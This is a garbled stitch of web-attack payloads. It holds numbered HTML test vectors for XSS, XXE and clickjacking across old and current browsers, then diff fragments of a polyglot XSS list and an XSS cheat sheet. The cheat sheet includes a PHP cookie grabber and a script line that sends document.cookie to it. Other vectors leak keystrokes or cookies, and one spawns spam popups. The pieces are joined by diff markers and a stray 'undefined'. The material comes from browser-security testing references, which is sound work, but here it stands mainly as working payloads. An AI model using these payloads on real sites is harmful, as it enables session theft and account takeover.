<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div>
|
||||||
|
<div id="39"><!-- up to Opera 11.52, FF 3.6.28 -->
|
||||||
|
<![><img src="]><img src=x onerror=alert(39)//">
|
||||||
|
|
||||||
|
<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->
|
||||||
|
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div>
|
||||||
|
<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div>
|
||||||
|
<div id="41"><li style=list-style:url() onerror=alert(41)></li>
|
||||||
|
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div>
|
||||||
|
<div id="42"><head><base href="javascript://"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["'`-->]]>]</div>
|
||||||
|
<div id="43"><?xml version="1.0" standalone="no"?>
|
||||||
|
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||||
|
<head>
|
||||||
|
<style type="text/css">
|
||||||
|
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>Hello</body>
|
||||||
|
</html>//["'`-->]]>]</div>
|
||||||
|
<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div>
|
||||||
|
<div id="53"><xml id="xss" src="test.htc"></xml>
|
||||||
|
<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div>
|
||||||
|
<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div>
|
||||||
|
<div id="61"><div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="62"><!-- IE 6-8 -->
|
||||||
|
<x '="foo"><x foo='><img src=x onerror=alert(62)//'>
|
||||||
|
|
||||||
|
<!-- IE 6-9 -->
|
||||||
|
<! '="foo"><x foo='><img src=x onerror=alert(2)//'>
|
||||||
|
<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
|
||||||
|
<img src="javascript:alert(2)">
|
||||||
|
<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓
|
||||||
|
<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div>
|
||||||
|
<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div>
|
||||||
|
<div id="66"><?xml version="1.0"?>
|
||||||
|
<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
|
||||||
|
<root/>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="67"><!DOCTYPE x [
|
||||||
|
<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"
|
||||||
|
onerror CDATA "alert(67)"
|
||||||
|
onload CDATA "alert(2)">
|
||||||
|
]><img />//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">
|
||||||
|
<html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x>
|
||||||
|
</doc>//["'`-->]]>]</div>
|
||||||
|
<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div>
|
||||||
|
<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div>
|
||||||
|
<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div>
|
||||||
|
<div id="87"><svg xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
|
||||||
|
<animation xlink:href="javascript:alert(88)"/>
|
||||||
|
<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
|
||||||
|
|
||||||
|
<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/>
|
||||||
|
|
||||||
|
<foreignObject xlink:href="javascript:alert(88)"/>
|
||||||
|
<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/>
|
||||||
|
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="89"><svg xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<set attributeName="onmouseover" to="alert(89)"/>
|
||||||
|
<animate attributeName="onunload" to="alert(89)"/>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="90"><!-- Up to Opera 10.63 -->
|
||||||
|
<div style=content:url(test2.svg)></div>
|
||||||
|
|
||||||
|
<!-- Up to Opera 11.64 - see link below -->
|
||||||
|
|
||||||
|
<!-- Up to Opera 12.x -->
|
||||||
|
<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="91">[A]
|
||||||
|
<? foo="><script>alert(91)</script>">
|
||||||
|
<! foo="><script>alert(91)</script>">
|
||||||
|
</ foo="><script>alert(91)</script>">
|
||||||
|
[B]
|
||||||
|
<? foo="><x foo='?><script>alert(91)</script>'>">
|
||||||
|
[C]
|
||||||
|
<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>">
|
||||||
|
[D]
|
||||||
|
<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div>
|
||||||
|
<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div>
|
||||||
|
<div id="94"><svg xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
<feImage>
|
||||||
|
<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,
|
||||||
|
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
|
||||||
|
</feImage>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
|
||||||
|
<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="97"><!-- IE 5-9 -->
|
||||||
|
<div id=d><x xmlns="><iframe onload=alert(97)"></div>
|
||||||
|
<script>d.innerHTML+='';</script>
|
||||||
|
|
||||||
|
<!-- IE 10 in IE5-9 Standards mode -->
|
||||||
|
<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>
|
||||||
|
<script>d.innerHTML+='';</script>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div>
|
||||||
|
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="99">XXX<style>
|
||||||
|
|
||||||
|
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
|
||||||
|
|
||||||
|
<!--
|
||||||
|
--><!--*{color:red} /* all UA */
|
||||||
|
|
||||||
|
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
|
||||||
|
|
||||||
|
</style>//["'`-->]]>]</div>
|
||||||
|
<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div>
|
||||||
|
<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo">
|
||||||
|
<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div>
|
||||||
|
<div id="108"><!-- IE 5-8 standards mode -->
|
||||||
|
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>">
|
||||||
|
|
||||||
|
<!-- IE 5-9 standards mode -->
|
||||||
|
<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
|
||||||
|
<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
|
||||||
|
<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<path d="M0,0" style="marker-start:url(test4.svg#a)"/>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div>
|
||||||
|
<div id="113"><div id="x">XXX</div>
|
||||||
|
<style>
|
||||||
|
|
||||||
|
#x{font-family:foo[bar;color:green;}
|
||||||
|
|
||||||
|
#y];color:red;{}
|
||||||
|
|
||||||
|
</style>//["'`-->]]>]</div>
|
||||||
|
<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div>
|
||||||
|
<div id="115"><!--[if]><script>alert(115)</script -->
|
||||||
|
<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="116"><div id="x">x</div>
|
||||||
|
<xml:namespace prefix="t">
|
||||||
|
<import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(116)>">//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="117"><a href="http://attacker.org">
|
||||||
|
<iframe src="http://example.org/"></iframe>
|
||||||
|
</a>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');">
|
||||||
|
<h1>Drop me</h1>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
|
||||||
|
|
||||||
|
<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="120"><script>
|
||||||
|
function makePopups(){
|
||||||
|
for (i=1;i<6;i++) {
|
||||||
|
window.open('popup.html','spam'+i,'width=50,height=50');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="121"><html xmlns="http://www.w3.org/1999/xhtml"
|
||||||
|
xmlns:svg="http://www.w3.org/2000/svg">
|
||||||
|
<body style="background:gray">
|
||||||
|
<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>
|
||||||
|
<svg:svg>
|
||||||
|
<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">
|
||||||
|
<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>
|
||||||
|
<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>
|
||||||
|
</svg:mask>
|
||||||
|
</svg:svg>
|
||||||
|
</body>
|
||||||
|
</html>//["'`-->]]>]</div>
|
||||||
|
<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div>
|
||||||
|
<div id="123"><span class=foo>Some text</span>
|
||||||
|
<a class=bar href="http://www.example.org">www.example.org</a>
|
||||||
|
|
||||||
|
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
|
||||||
|
<script>
|
||||||
|
$("span.foo").click(function() {
|
||||||
|
alert('foo');
|
||||||
|
$("a.bar").click();
|
||||||
|
});
|
||||||
|
$("a.bar").click(function() {
|
||||||
|
alert('bar');
|
||||||
|
location="http://html5sec.org";
|
||||||
|
});
|
||||||
|
</script>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
|
||||||
|
<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="125"><?xml version="1.0"?>
|
||||||
|
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
|
||||||
|
<!DOCTYPE doc [
|
||||||
|
<!ATTLIST xsl:stylesheet
|
||||||
|
id ID #REQUIRED>]>
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||||
|
<xsl:template match="/">
|
||||||
|
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe>
|
||||||
|
</xsl:template>
|
||||||
|
</xsl:stylesheet>
|
||||||
|
<circle fill="red" r="40"></circle>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
|
||||||
|
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">
|
||||||
|
<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
|
||||||
|
<handler id="y">alert(127)</handler>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
<div id="128"><svg><style><img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div>
|
||||||
|
<div id="129"><svg>
|
||||||
|
<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>
|
||||||
|
<!--
|
||||||
|
Same effect with
|
||||||
|
<image filter='...'>
|
||||||
|
-->
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="130"><math href="javascript:alert(130)">CLICKME</math>
|
||||||
|
|
||||||
|
<math>
|
||||||
|
<!-- up to FF 13 -->
|
||||||
|
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
|
||||||
|
|
||||||
|
<!-- FF 14+ -->
|
||||||
|
<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
|
||||||
|
</math>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
|
||||||
|
<br/><hr/>
|
||||||
|
jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
|
||||||
|
<br/><hr/>
|
||||||
|
feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
|
||||||
|
<br/><hr/>
|
||||||
|
feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>
|
||||||
|
<br/><hr/>
|
||||||
|
feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
|
||||||
|
<br/><hr/>
|
||||||
|
<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="132"><!doctype html>
|
||||||
|
<form>
|
||||||
|
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
|
||||||
|
<br>
|
||||||
|
<input name="secret" type="password">
|
||||||
|
</form>
|
||||||
|
<!-- injection --><svg height="50px">
|
||||||
|
<image xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
|
||||||
|
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
|
||||||
|
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
|
||||||
|
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
|
||||||
|
</image>
|
||||||
|
</svg>//["'`-->]]>]</div>
|
||||||
|
<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>
|
||||||
|
<div id="134"><xmp>
|
||||||
|
<%
|
||||||
|
</xmp>
|
||||||
|
<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
x='<%'
|
||||||
|
</script> %>/
|
||||||
|
alert(2)
|
||||||
|
</script>
|
||||||
|
|
||||||
|
XXX
|
||||||
|
<style>
|
||||||
|
*['<!--']{}
|
||||||
|
</style>
|
||||||
|
-->{}
|
||||||
|
*{color:red}</style>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?>
|
||||||
|
<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
|
||||||
|
<template match="/">
|
||||||
|
<eval>new ActiveXObject('htmlfile').parentWindow.alert(135)</eval>
|
||||||
|
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
|
||||||
|
</template>
|
||||||
|
</stylesheet>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="136"><form action="" method="post">
|
||||||
|
<input name="username" value="admin" />
|
||||||
|
<input name="password" type="password" value="secret" />
|
||||||
|
<input name="injected" value="injected" dirname="password" />
|
||||||
|
<input type="submit">
|
||||||
|
</form>//["'`-->]]>]</div>
|
||||||
|
|
||||||
|
<div id="137"><svg>
|
||||||
|
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
|
||||||
|
<circle r="400"></circle>
|
||||||
|
<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" />
|
||||||
|
</a>//["'`-->]]>]</div>
|
||||||
|
<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="<img src=x:x onerror=alert(1)>" />//["'`-->]]>]</div>undefined
|
@ -1,19 +0,0 @@
|
|||||||
Polyglot XSS - 0xsobky
|
|
||||||
```
|
|
||||||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
|
||||||
```
|
|
||||||
|
|
||||||
Polyglot XSS - Ashar Javed
|
|
||||||
```
|
|
||||||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
|
||||||
```
|
|
||||||
|
|
||||||
Polyglot XSS - Mathias Karlsson
|
|
||||||
```
|
|
||||||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
|
||||||
```
|
|
||||||
|
|
||||||
Polyglot XSS - Rsnake
|
|
||||||
```
|
|
||||||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
|
||||||
```
|
|
@ -1,11 +1,11 @@
|
|||||||
# Cross Site Scripting
|
# Cross Site Scripting
|
||||||
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
|
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
|
||||||
|
|
||||||
## Exploit code or POC
|
## Exploit code or POC
|
||||||
|
|
||||||
Cookie grabber for XSS
|
Cookie grabber for XSS
|
||||||
```
|
```
|
||||||
<?php
|
<?php
|
||||||
// How to use it
|
// How to use it
|
||||||
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
||||||
|
|
||||||
@ -18,7 +18,7 @@ fclose($fp);
|
|||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
## XSS in HTML/Applications
|
## XSS in HTML/Applications
|
||||||
XSS Basic
|
XSS Basic
|
||||||
```
|
```
|
||||||
Basic payload
|
Basic payload
|
||||||
@ -73,11 +73,11 @@ With an additional URL
|
|||||||
|
|
||||||
XSS in flash application
|
XSS in flash application
|
||||||
```
|
```
|
||||||
\%22})))}catch(e){alert(document.domain);}//
|
\%22})))}catch(e){alert(document.domain);}//
|
||||||
|
|
||||||
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
|
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
|
||||||
|
|
||||||
"a")(({type:"ready"}));}catch(e){alert(1)}//
|
"a")(({type:"ready"}));}catch(e){alert(1)}//
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in Hidden input
|
XSS in Hidden input
|
||||||
@ -186,7 +186,7 @@ You need these 3 components
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
A little example
|
A little example
|
||||||
```
|
```
|
||||||
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
||||||
<html>
|
<html>
|
||||||
@ -202,7 +202,7 @@ Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
|||||||
|
|
||||||
Explanation of the vulnerability
|
Explanation of the vulnerability
|
||||||
```
|
```
|
||||||
The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
